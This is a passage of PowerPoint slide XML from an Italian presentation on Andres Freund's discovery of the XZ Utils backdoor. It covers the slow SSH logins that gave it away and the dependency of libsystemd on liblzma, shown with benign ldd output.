          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Ci sono errori </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>e fallimenti di alcuni check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>attorno a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>, parte di XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>I login SSH impiegano più tempo del solito (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>0m0.807s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>anziché </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>0m0.299s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>C'è un collegamento tra SSH e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>libzlma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Per alcune </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>distro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>, sì: tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6032959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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1949749"/>
            <a:ext cx="11866844" cy="42165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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> è un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>di Linux: processo di boot, PID 1, gestisce i servizi di sistema e relative configurazioni (dette </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>unit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Il protocollo SSH è implementato con la libreria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>OpenSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>, costituita dai programmi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>(client) ed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>(server), quest'ultimo rientra tra i system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> di Linux;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>è una libreria di compressione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>In che modo sono collegati?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27461909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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1948474"/>
            <a:ext cx="11866844" cy="200054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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>SSH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Come Andres Freund scrive nella sua mail, la libreria di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>libsystemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>ha tra le dipendenze la libreria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>. Diverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>distro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>, come quella presa in analisi da Andres Freund, presentano questa relazione. Esempio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Kubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 22.04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Ligh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issue #32028</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>):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8073ABEA-8696-43F0-8E00-1E551AE721AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653143" y="4040084"/>
            <a:ext cx="10878291" cy="255454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60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      # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1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ldd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="160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 libsystemd.so.0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="160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        linux-vdso.so.1 (0x00007fff97fbd000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="160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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>liblzma.so.5 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/x86_64-linux-gnu/liblzma.so.5 (0x00007f9519a77000)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="160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    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="160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        libzstd.so.1 =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" err="1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lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="160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/x86_64-linux-gnu/libzstd.so.1 (0x00007f95199a8000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="160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        liblz4.so.1 =&gt; /</a:t>
            </a:r>
            <a:r>
